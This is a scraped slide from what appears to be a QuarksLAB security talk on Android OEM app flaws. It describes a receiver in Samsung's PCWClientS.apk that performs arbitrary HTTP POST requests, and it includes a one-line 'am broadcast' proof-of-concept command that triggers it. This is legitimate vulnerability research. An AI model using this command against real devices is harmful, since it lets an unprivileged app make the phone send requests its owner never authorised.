Android OEM's applications (in)security and backdoors ... - QuarksLAB
Android OEM's applications (in)security and backdoors ... - QuarksLAB
Android OEM's applications (in)security and backdoors ... - QuarksLAB
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Arbitrary HTTP requests execution<br />
Vuln2 - PCWClientS.apk<br />
PCWReceiver<br />
When an Intent is received with<br />
com.sec.pcw.device.HTTP_REQUEST_RETRY as action<br />
The body, uri <strong>and</strong> pushType attributed are extracted <strong>and</strong> an<br />
HTTP POST request is executed based on it<br />
PoC<br />
shell@<strong>and</strong>roid:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri<br />
*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*